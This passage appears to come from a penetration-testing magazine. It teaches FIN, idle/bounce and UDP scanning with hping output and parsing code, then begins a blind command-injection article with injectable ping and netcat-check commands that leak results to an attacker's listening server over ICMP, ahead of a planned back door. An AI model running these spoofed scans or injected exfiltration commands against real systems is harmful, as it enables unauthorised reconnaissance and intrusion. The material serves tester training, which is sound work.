len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.2 ms
//Hey port 22 is gone!
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms
--- 127.0.0.1 hping statistic ---
26 packets tramitted, 25 packets received, 4% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#


FIN Scan

A FIN scan sends a packet with only the FIN flag set, which normally signals the end of a connection. According to RFC 793 a closed port answers it with RST, while an open port that has no connection matching the packet silently drops it. Note the difference between the two ways a connection ends: FIN is the graceful close, any data still in flight is delivered before the connection terminates, whereas RST is an abort that discards whatever is pending.
This type of scan is used to bypass simple SYN-filtering firewalls. The catch is that open ports do not respond, since they have to read the packet silently and not answer it. So if the FIN packets are filtered by a firewall, all the ports will look open! Using nmap we get the same results as the other scans: Listing 11.
We cannot see what is going on because the program does everything for us, so we use hping to watch the responses the server sends: Listing 12.
As you can see from the comment, port 22 is not printed; the packet is "lost", and that means port 22 is open, since the host processed the FIN silently and dropped it. Keep in mind that silence can also mean a filter ate the probe, which is why newer nmap versions report such ports as open|filtered rather than open.
This type of scan is pretty much like a SYN scan, so this part is short; just remember that in a FIN scan open ports do not respond.
Warning: Windows does not behave as the RFC requires (what a surprise!) and replies with RA on open ports too, so the scanners show all the ports as closed.
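To make the FIN scan reasoning concrete, here is a small added example (mine, not the author's code) that models how a target's TCP stack answers lone SYN and FIN probes under RFC 793, and what a scanner can honestly conclude from each answer. The three target profiles (an RFC-conformant host, a firewall that drops SYNs and optionally FINs, and a Windows host answering RST/ACK to a FIN on an open port) and the port numbers are hypothetical. Running it shows the two failure modes described above: every port looking open behind a FIN-dropping filter, and every port looking closed on Windows.

```python
# Added example (not code from the article): a model of how a target's TCP
# stack answers single-packet SYN and FIN probes, and what the scanner can
# infer from each answer.  Targets, ports and firewall behaviours are hypothetical.
from dataclasses import dataclass
from typing import Dict, Iterable, Optional


@dataclass(frozen=True)
class Target:
    open_ports: frozenset
    drops_syn: bool = False       # simple "SYN filtering" firewall in front of the host
    drops_fin: bool = False       # a filter that also drops lone FIN probes
    windows_quirk: bool = False   # Windows: RST/ACK to a FIN on an open port instead of silence


def respond(target: Target, dport: int, probe: str) -> Optional[str]:
    """Flags of the reply the target sends ('SA' or 'RA'), or None if it stays silent."""
    if probe == "S":
        if target.drops_syn:
            return None
        return "SA" if dport in target.open_ports else "RA"
    if probe == "F":
        if target.drops_fin:
            return None
        if dport in target.open_ports:
            # RFC 793: a segment without SYN or RST that belongs to no connection is
            # dropped by a listening socket; Windows answers it with RST/ACK instead.
            return "RA" if target.windows_quirk else None
        return "RA"  # closed port: RST/ACK, exactly as for a SYN
    raise ValueError(f"unsupported probe flags {probe!r}")


def infer(probe: str, reply: Optional[str]) -> str:
    """Scanner-side verdict.  Silence after a FIN cannot be told apart from a
    dropped probe, so the honest verdict is 'open|filtered', not 'open'."""
    if probe == "S":
        return {"SA": "open", "RA": "closed"}.get(reply, "filtered")
    if probe == "F":
        return "closed" if reply == "RA" else "open|filtered"
    raise ValueError(f"unsupported probe flags {probe!r}")


def scan(target: Target, ports: Iterable[int], probe: str) -> Dict[int, str]:
    """Send one probe type to each port and collect the verdicts."""
    return {p: infer(probe, respond(target, p, probe)) for p in ports}


if __name__ == "__main__":
    ports = [21, 22, 111]
    hosts = {
        "rfc host": Target(frozenset({22, 111})),
        "syn-filtering firewall": Target(frozenset({22, 111}), drops_syn=True),
        "syn+fin-filtering firewall": Target(frozenset({22, 111}), drops_syn=True, drops_fin=True),
        "windows": Target(frozenset({22, 111}), windows_quirk=True),
    }
    for name, t in hosts.items():
        print(f"{name:28s} SYN: {scan(t, ports, 'S')}  FIN: {scan(t, ports, 'F')}")
```

The SYN-filtering case is the one the FIN scan was invented for: the SYN scan reports every port filtered while the FIN scan still tells closed ports apart from the rest. Add FIN filtering and every port collapses to open|filtered; turn on the Windows quirk and every port reads closed, the false negative the warning above is about.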

Bounce Scanning

By now every IDS in your network should be screaming "hacker" all over the place with your IP in every log; remember I said these are not really stealthy scans. Now on to the stealthy part of scanning.

Listing 13. hping sending SYN/ACK packets to a host
root@fscking:~# hping -S -A -r -n 192.168.132.1 -p 100
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=16133 sport=100 flags=R seq=0 win=0 rtt=17.0 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=1 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=4 win=0 rtt=0.3 ms
--- 192.168.132.1 hping statistic ---
5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.3/3.6/17.0 ms
root@fscking:~#

Listing 14. hping sending SYN/ACK packets to the Windows host to read its IP ID (first shell)
root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=20058 sport=130 flags=R seq=0 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.3 ms
And the count just keeps on going but for the sake of brevity I will not put everything here!

Listing 15. hping sending SYN packets with fake address to a host
root@fscking:~# hping -S -a 192.168.132.1 -p 80 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes
Program seems to hang in here, look at the other terminal

Some years ago a way to bounce a scan through Windows machines and routers was published. Because the Windows TCP/IP stack is so predictable, the IP ID field of the RST packets it sends can be read and used to tell when that host has been sending other packets; by spoofing packets from that host to the victim and watching its IP ID counter, the real IP address of the attacker is hidden from the victim.
While it is not being pushed with traffic, Windows increments the IP ID by 1 for every packet it sends, sequentially rather than randomizing it as some other operating systems do, which gives us the opportunity to spoof the connection nicely and get some nice results. So when you send a packet and get a RST back, the id increments sequentially: Listing 13.
Using the -r option we see the increment relative to the previous reply, here +2: the first packet had id 16133, and each later line shows that packet's id minus the id of the one before it (16135 - 16133 = 2). In practice the idle baseline is whatever the host's background traffic makes it (here +2 rather than the textbook +1); what matters is that it is sequential, which gives us the opportunity to spoof the connection.
Now imagine a network like this: Figure 1.

Figure 1. Steps taken for a bounce scan

If you start pulling the IP ID from the spoofed machine, you can see it increments by the same amount every time. Now the attacker sends a spoofed SYN packet that looks like it comes from the spoofed machine to the victim. As soon as the victim answers with the appropriate SYN/ACK, the spoofed machine is going to RST it; why? Because it did not initiate the connection, so it is not in its table; it resets the connection, and of course that RST carries an IP ID. The next time we send a SYN/ACK to pull the IP ID from the spoofed machine, the increment is not going to be 1 but 2, since it already sent another packet (the RST) to the victim, telling us that the port we spoofed to is open.
You cannot RST a RST packet, so if the port is closed the spoofed machine will get a RST from the victim, drop it silently and not increment its IP ID. This way, if we pull the IP ID constantly while sending spoofed packets to the victim, we can tell which ports are open.
The firewall and the IDS on the victim are going to think the scan is coming from the spoofed machine; there goes your very expensive IDS. It gives the attacker the appearance of coming from different hosts at the same time, and of course if the tool is paced right it looks like normal traffic or worm traffic.
For this type of scan you need two shells, next to each other if possible or at least visible at the same time. In the first one we start pulling the IP ID from a Windows machine: Listing 14.
Warning note: that port does not need to be open, since you want a RST, not a SYN/ACK. Now you only need a non-firewalled Windows machine on the Internet with low traffic; something hard to find, huh?
When you are ready, the next command sends a lot of packets to the victim machine spoofed as coming from the Windows machine (you don't get any output from this command): Listing 15.
If the port is open you will notice an increment in the id; in my case port 80 is not open, so nothing happens (the victim answers with a RST, which the Windows machine drops, and the id keeps ticking at +2 as in the first lines of Listing 16). Try to guess on which line of Listing 16 I typed the next command and started sending spoofed packets to port 22: Listing 17.
As you can see, the increment jumped to +102 and stayed there. The size of the jump is roughly the number of spoofed SYNs sent between two pulls, since every SYN/ACK the victim sends costs the Windows machine one extra RST. As soon as I hit Ctrl-C to stop sending packets, the increment went back down to +2. This tells me the port is open, and the victim's logs show the Windows machine. Very nice and easy to do, although doing it one port at a time is really painful, right? A bounce scanner can be downloaded at http://www.security-dojo.com/code/bscan.c.

UDP Scan

Some services run over the User Datagram Protocol because they do not need a connection and want to avoid its overhead (mountd, nfsd and others, for example). These services have their own port assignments, and since it is a different protocol a UDP port number can be the same as a TCP one while the service is not! A very widely used UDP service is the nameserver, which listens on port 53 UDP (and TCP); resolution requests go over UDP by default.


How do we know a UDP port is open? By RFC, a closed port should answer with ICMP Port Unreachable and an open port should not respond to our empty datagram, so we can write our own scanner based on that. Let's see an example using hping (Listing 18).
Port 53 (domain) is closed on the machine, so it returns ICMP Port Unreachable since the service is not there; port 111 (sunrpc) is open, so it returns nothing. Remember UDP is a connectionless protocol, so every packet is assumed to carry data meant for the application, and a service that gets an empty datagram it does not understand usually just discards it. Keep in mind that silence is ambiguous: a firewall dropping the probe (or the ICMP reply) looks exactly like an open port, which is why later versions of nmap report such ports as open|filtered. You can use a canned tool such as nmap and the results would look like Listing 19. As you can see the results are the same; you could use hping to scan the entire range using the -p ++ option, or even write your own UDP scanner.

Listing 16. hping sending SYN/ACK packets to the Windows host while the spoofed packets of Listing 17 are sent
root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=21078 sport=130 flags=R seq=0 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=5 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=6 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=7 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=8 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=9 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=10 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=11 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=12 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=13 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=14 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+6 sport=130 flags=R seq=15 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+123 sport=130 flags=R seq=16 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=17 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=18 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=19 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=20 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=21 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+59 sport=130 flags=R seq=22 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=23 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=24 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=25 win=0 rtt=0.3 ms
--- 192.168.132.1 hping statistic ---
26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.3/0.5 ms
root@fscking:~#

Listing 17. hping sending SYN packets with a spoofed source address to the victim's port 22 (second shell)
root@fscking:~# hping -S -a 192.168.132.1 -p 22 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes
--- 192.168.132.2 hping statistic ---
619 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

Conclusion

This article covers a lot of code and not a lot of writing (which was fun for me); there is not much new to say about scanning. Knowing what happens behind network scanners such as nmap helps a lot. If you don't understand why you get a RST when you send a SYN/ACK instead of a SYN, or feel your TCP/IP theory is lacking, I recommend reading TCP/IP Illustrated, volumes I, II and III, by W. Richard Stevens; they are the best books on the subject.
Scanning is highly underrated. It is the first hands-on step in gathering information about the network: it reports open ports, operating systems, filtered ports, whether there are firewalls, how they are built and what their policies are, etc.

A good scan is half the penetration of the machine: having reliable information is basic to analyzing the host without underestimating or overestimating it.

Enrique Sanchez

Enrique Sanchez is a member of the Accuvant LABS Enterprise Attack and Penetration Testing team. Enrique has over 14 years of experience in computer security, working with industries including pharmaceutical, healthcare, banking, government, gaming and others. Enrique writes for various blogs such as question-defense.com and security-dojo.com. His main interests range from reverse engineering, exploit creation, artificial intelligence, neural networks and robotics to music, horses, video games and writing technical papers.

Listing 18. hping sending UDP packets to port 53 and port 111
root@fscking:~# hping --udp -n 192.168.132.2 -p 53    //We are sending UDP to port 53
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
--- 192.168.132.2 hping statistic ---
5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~# hping --udp -n 192.168.132.2 -p 111
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes
--- 192.168.132.2 hping statistic ---
8 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

Listing 19. nmap doing a UDP scan
root@fscking:~# nmap -sU -n 192.168.132.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.132.2):
(The 1467 ports scanned but not shown below are in state: closed)
Port       State       Service
111/udp    open        sunrpc
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
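The hping listings above leave the interpretation to the reader: grep SA for open TCP ports, count ICMP Port Unreachable replies for UDP, and eyeball the id=+N column for the bounce scan. The following is an added Python example (mine, not the article's code and not bscan.c) that does that reading mechanically from saved hping2 output. It parses reply lines in the layout hping2 prints in Listings 7 to 18, names the ports that never answered a SYN as filtered, treats UDP silence as open|filtered, and for the idle scan compares the zombie's IP ID increments during the spoofed probes with the noisiest increment seen while it was idle, so a +3 blip in the baseline is not mistaken for an open port. The sample output is constructed (RFC 5737 documentation addresses, invented port states), not a capture.

```python
# Added example (not code from the article): turn raw hping2 output into scan
# verdicts.  SAMPLE_* below is constructed to follow the field layout hping2
# prints; addresses are RFC 5737 documentation addresses, port states invented.
import re
from statistics import median

# One T
# CP reply line as hping2 prints it, e.g.
#   len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.2 ms
# With -r every id after the first is printed relative to the previous reply (id=+2).
TCP_RE = re.compile(
    r"len=\d+ ip=(?P<ip>\S+) ttl=\d+ (?:DF )?id=(?P<id>[+-]?\d+) "
    r"sport=(?P<sport>\d+) flags=(?P<flags>[A-Z]*) seq=(?P<seq>\d+) win=(?P<win>\d+)")
ICMP_RE = re.compile(r"ICMP Port Unreachable from ip=(?P<ip>\S+)")


def parse_tcp(lines):
    """TCP reply lines as dicts; banner and statistics lines do not match and are skipped."""
    replies = []
    for line in lines:
        m = TCP_RE.search(line)
        if m:
            replies.append({"sport": int(m["sport"]), "flags": m["flags"],
                            "win": int(m["win"]), "seq": int(m["seq"]), "id": m["id"]})
    return replies


def syn_scan_verdicts(lines, probed_ports):
    """SYN scan: SA with a non-zero window => open, R => closed, no reply => filtered.
    Knowing which ports we probed lets us name the silent ones, which 'grep SA' cannot."""
    by_port = {r["sport"]: r for r in parse_tcp(lines)}
    verdicts = {}
    for port in probed_ports:
        r = by_port.get(port)
        if r is None:
            verdicts[port] = "filtered"
        elif "R" in r["flags"]:
            verdicts[port] = "closed"
        elif "S" in r["flags"] and "A" in r["flags"] and r["win"] > 0:
            verdicts[port] = "open"
        else:
            verdicts[port] = "unexpected:" + r["flags"]
    return verdicts


def udp_verdict(lines):
    """UDP: ICMP Port Unreachable => closed; silence => open|filtered, because an open
    service ignoring an empty datagram and a firewall dropping the probe look identical."""
    return "closed" if any(ICMP_RE.search(l) for l in lines) else "open|filtered"


def idle_scan_verdict(lines, baseline_seqs, probe_seqs):
    """Bounce (idle) scan read-out from 'hping -S -A -r' against the zombie.
    baseline_seqs: seq numbers pulled before the spoofed SYNs started;
    probe_seqs:    seq numbers pulled while they were being sent.
    Every SYN/ACK the victim sends the zombie costs the zombie one RST, so the
    increment rises above its idle ceiling only if the target port is open."""
    delta = {r["seq"]: int(r["id"]) for r in parse_tcp(lines) if r["id"].startswith("+")}
    idle = [delta[s] for s in baseline_seqs]
    busy = [delta[s] for s in probe_seqs]
    ceiling = max(idle)                       # noisiest idle increment, not the median
    verdict = "open" if min(busy) > ceiling else "closed|filtered"
    return {"baseline": median(idle), "ceiling": ceiling, "peak": max(busy),
            "extra_rsts": max(busy) - median(idle), "verdict": verdict}


# ---- constructed sample output (not a capture) ---------------------------------
def _tcp_line(sport, flags, win, id_, seq, ip="192.0.2.10"):
    return f"len=44 ip={ip} ttl=64 DF id={id_} sport={sport} flags={flags} seq={seq} win={win} rtt=0.2 ms"


SAMPLE_SYN = [
    "HPING 192.0.2.10 (eth0 192.0.2.10): S set, 40 headers + 0 data bytes",
    _tcp_line(21, "RA", 0, 0, 0), _tcp_line(22, "SA", 32767, 0, 1),
    _tcp_line(23, "RA", 0, 0, 2), _tcp_line(111, "SA", 32767, 0, 4),   # port 80 (seq 3) never answered
    "--- 192.0.2.10 hping statistic ---", "5 packets tramitted, 4 packets received, 20% packet loss"]
SAMPLE_UDP_CLOSED = ["HPING 192.0.2.10 (eth0 192.0.2.10): udp mode set, 28 headers + 0 data bytes",
                     "ICMP Port Unreachable from ip=192.0.2.10", "ICMP Port Unreachable from ip=192.0.2.10"]
SAMPLE_UDP_SILENT = ["HPING 192.0.2.10 (eth0 192.0.2.10): udp mode set, 28 headers + 0 data bytes",
                     "--- 192.0.2.10 hping statistic ---", "3 packets tramitted, 0 packets received, 100% packet loss"]
# Zombie pulled once a second: idle +2 with one +3 blip, then +102 while ~100 spoofed SYNs/s hit an open port.
ZOMBIE = "192.0.2.20"
SAMPLE_IDLE_OPEN = [_tcp_line(130, "R", 0, 21078, 0, ZOMBIE)] + [
    _tcp_line(130, "R", 0, f"+{d}", s, ZOMBIE)
    for s, d in enumerate([2, 2, 2, 3, 2, 2, 102, 102, 102, 2, 2], start=1)]
SAMPLE_IDLE_CLOSED = [_tcp_line(130, "R", 0, 21078, 0, ZOMBIE)] + [
    _tcp_line(130, "R", 0, "+2", s, ZOMBIE) for s in range(1, 12)]

if __name__ == "__main__":
    print(syn_scan_verdicts(SAMPLE_SYN, [21, 22, 23, 80, 111]))
    print(udp_verdict(SAMPLE_UDP_CLOSED), udp_verdict(SAMPLE_UDP_SILENT))
    print(idle_scan_verdict(SAMPLE_IDLE_OPEN, baseline_seqs=range(1, 7), probe_seqs=range(7, 10)))
    print(idle_scan_verdict(SAMPLE_IDLE_CLOSED, baseline_seqs=range(1, 7), probe_seqs=range(7, 10)))
```

To use it on a real run, redirect the first shell's hping output to a file, note the seq numbers before and during the spoofed burst, and feed both ranges to idle_scan_verdict; requiring the whole probe window to sit above the idle ceiling is what keeps the occasional +3 or +6 from the zombie's own traffic from being reported as an open port.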


Audit Firewalls, Switches & Routers and produce expert level reports

Device Support
Nipper Studio can audit over 100
different network device types. This
includes a range of devices from
the major manufacturers such as
Cisco, Juniper & Checkpoint as well
as many, many more. We are adding
support for new devices all the time.

Quick to Implement
Unlike server based systems which
require installation and higher
maintenance overheads, Nipper
Studio can be downloaded from our
website and installed in minutes.

Licensing
Nipper Studio is licensed per device.
Licenses can be managed centrally
or split between multiple auditors,
clients or sites.

Continuous Monitoring
Nipper Studio can be scripted
to integrate into a continuous
monitoring system, or used for point
in time auditing.
For fast integration with other tools
our graphical interface shares the
same library as our command line
version.

Nipper Studio- Your Expert in a Box
Nipper Studio produces expert level audit reports on your network device
configurations. You can quickly and easily monitor your network security in the
intervals between manual tests. Nipper Studio produces a report that:
1. Summarizes the security of your network devices e.g. firewalls, switches and
routers
2. Produces a detailed report which highlights the vulnerabilities in your
configurations
3. Rates these vulnerabilities by severity of threat and ease of resolution
4. Provides an easy to action mitigation plan based on your customized settings
with potential resolutions including command line fixes to resolve the issue
5. Offers an audit change tracking function, enabling you to include a change
comparison within your security audit, so you can easily view the progress of
your network security

Versatile Reporting
Networks are becoming ever more complex and you need a tool that will evolve with your needs. Nipper Studio has been built from a real world perspective to be as flexible as possible. Reports include management overviews, uniform views of disparate device configurations, full security audit and compliance reports. You can also:
1. Choose to run only the configuration audit, just the security audit or the full report
2. Export sections of the report so you can distribute it to the appropriate people
3. Choose from a huge range of configuration options e.g. hiding passwords within the report, applying classification information to the document and customizing your reports throughout. This means the settings can be quickly applied before scripting the tool for conditional or time based audits.

ROI- Saving Time & Money

Nipper Studio produces Penetration Test level device reports in seconds and helps maintain expert level security analysis, reduce the risk of breaches & lower the cost of external audits. A Nipper Studio starter pack costs only $1000 and scalable global licensing is also available. All packages offer a great return on investment.

Contact us...
[email protected]
T: +44 (0) 1905 888785
www.titania.com


County House · St Mary’s Street · Worcester WR1 1HB · UK

N-OVE-0313-US

POTENTIAL ATTACKS & DEFENsE METHODS

Blind Command Line Injection
Blind Command Line injection (BCLIi) is when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLIi is typically found in poorly coded applications that allow access to files or data through a web interface. If these hosts are Internet facing, the injected code could result in the compromise of the De-Militarized Zone (DMZ) and eventually the internal network. Identifying a location that could potentially yield BCLIi is difficult.

T

his is due to the lack of execution confirmation and the limited intelligence of where the
server side code accesses a local resource.
Locations that may have BCLIi usually reach system resources or commands through either GET or POST parameters. The first step is to determine whether the underlying operating system is Linux, UNIX or Windows. There are many ways to do this, and they are not covered here. The next step is to determine whether Command Line Injection (CLIi) is present at all and, if it is, whether it is blind. Appending a semicolon followed by "ls" (Linux) or "dir" (Windows) to the parameter value yields one of three results. Result one (1): the page displays the command output inside the web session, proving that the system is vulnerable to CLIi and that the injection is not blind. Result two (2): nothing comes back to the screen, but the server may still have processed the command. Result three (3): the command was properly ignored or discarded. This example uses Internet Control Message Protocol (ICMP) echo packets to return the results of injected commands. Many organizations block ICMP from external sources but often allow ICMP echo requests that originate inside the internal network to leave it.
This example requires a few things: the target host must be Linux, ICMP echo requests must be allowed to leave the network, and netcat must be installed on the system. There are ways around each of these conditions if they cannot be met, but they are not shown here. Lastly, all injected commands must be Uniform Resource Locator (URL) encoded so that characters such as ";", "|" and spaces are not dropped or mangled by the web server.

StartKit 01/2013(01)
So as a Penetration Tester you have found a potential injection point but receive no output for any command you test. There are two ways to obtain a return confirmation: one is to use ICMP echo packets of different byte sizes to return positive and negative acknowledgements for each command; the other is to change the pattern carried in the ICMP echo request with ping's "-p" argument. This example uses the differential byte size approach because some Intrusion Detection System or Intrusion Prevention System (IDS/IPS) configurations flag ICMP echo requests whose padding pattern changes. Tcpdump is used to catch the results sent to the listening server.
In the code examples that follow, the execution location is denoted by either "attacker@pentest:~#" or "victim@pentest:~$". "attacker" identifies the listening server, while "victim" denotes the BCLIi-vulnerable web application.
Listing 1 shows how to set up tcpdump on the attacker's machine to catch ICMP echo requests.

Page 46

http://pentestmag.com

Listing 2 shows the injectable ping command, which changes the default data size from fifty-six (56) to fifty-seven (57) bytes and sends the packet to the listening server. The packet carries 57 bytes of data plus the eight (8) byte ICMP header, so tcpdump reports an ICMP length of sixty-five (65) bytes (the IP total length is 20 bytes larger; the figures in this article are the ICMP lengths). Receiving it confirms two (2) things: that ICMP echo requests can reach the listener, and that BCLIi is possible. Figure 1 shows the ping injected into the target web server.
Figure 2 shows the received packet with a 65-byte length, which confirms the presence of BCLIi. Now that blind command injection has been confirmed, the tester has to find out whether a utility is already present to create a back door.
Next, the Penetration Tester determines whether netcat is present on the target system. The "which" command reports whether netcat is installed through its exit status. A true result causes a ping one (1) byte larger than the default to be sent, while a false result sends a standard ping to the listening server. Listing 3 and Figure 3 show the command and its injection. Figure 4 shows the increased packet size of sixty-five (65) bytes, which represents a true positive: netcat is installed.
The next injected command lists the ports the target server has "open" (listening) behind the Internet-facing firewall. All too often a firewall has been configured to allow egress traffic on ports that an internal device listens on; an example would be authorizing web servers to browse the Internet over port eighty (80).
To report the listening ports, one ICMP echo request per port is sent with its data padded by a number of bytes equal to the port number. As an example, a listening port of eighty (80) produces a packet of one hundred and forty-four (144) bytes: the default data size of fifty-six (56) bytes plus the eight (8) byte header plus eighty (80) bytes of padding. As a safety precaution against triggering "Ping of Death" alerts, any combination that would reach 65527 bytes or more is dropped (Linux ping itself refuses payloads above 65507 bytes). This precaution only eliminates a few ports in the ephemeral range, which should not have listening services attached to them anyway. To capture this traffic, tcpdump has to be restarted with the extra argument and option to write the data to a packet capture (pcap) output file, as shown in Listing 4.
The netstat command shown in Listing 5 is injected into the target server to collect the unique listening port numbers and send them to the listening server by ICMP echo.

Figure 1. Injection of Modified Ping Command

Figure 2. Confirmed BCLIi Through a Differentiation of ICMP
Echo Request Packet Length

Figure 3. The Command Injected To Determine the Presence
of netcat

Figure 4. The Port Forwarder netcat is Installed

Listing 1. Capture ICMP Echo Requests with tcpdump
# options go before the filter expression; -s 0 captures whole packets, -X dumps hex and ASCII
sudo tcpdump -i any -vvv -s 0 -X 'icmp[icmptype] = icmp-echo'

Listing 2. Command to Send an ICMP Echo Request of a Slightly Larger Size
# 57 data bytes + 8-byte ICMP header = the 65-byte ICMP length tcpdump reports
ping -c 1 -s 57 <listening server>

Listing 3. This Command Determines If netcat is Installed on the Target System
# test the pipeline's exit status directly: written as "... | if [ $? -eq 0 ]", $? is not grep's status
if which nc | grep -q "/nc" ; then ping -c 1 -s 57 <listening server> ; else ping -c 1 -s 56 <listening server> ; fi


Figures 5 and 6 show the injected command that determines which ports are listening on the target server, and the tcpdump capture of the associated packets.
Once these packets are captured, the results can be parsed to determine which ports are actually listening: read the pcap file, extract the packet length of each echo request, subtract the standard ping packet size and write the remainder to a text file. The final results are the listening ports found on the target server; the command is in Listing 6.
This data shows the actual ports listening on the web server behind the firewall. The firewall may also not have been configured to prevent the web server from initiating connections out on these ports.

Figure 5. BCLIi Command to Discover Listening Ports

Figure 6. The Capture of Fourteen (14) Packets

Figure 7. Shows Ports Discovered

These ports are a starting point for determining whether connections can egress through the firewall to the target listening host. Figure 7 shows the listening ports discovered.
Now that the potential open ports have been determined, netcat is used to connect from the target to the listening server on each of those ports. When a connection succeeds, a message is sent to signify which ports let data through. To capture all the message details the tcpdump listener has to be adjusted to capture traffic from the target server to the listening server, as shown in Listing 7.
Listing 8 shows the injected command that iterates through the list of ports discovered open and echoes a greppable message, "Mark port #", to the listening server. This restricted list of ports is used first, instead of a range, because it is stealthier and less likely to be caught; if it did not work, blocks of ports could be tested as ranges. These techniques are used to keep an IDS/IPS solution from detecting the outgoing port queries.
Figure 8 shows the injected command used to iterate over the ports that might be granted external access. Listing 9 shows how to read the pcap file and grep out the "Mark port" flag to determine which ports can be communicated on. Once the egress ports have been verified, a back door into the system can be set up. Figure 9 shows the egress ports discovered.
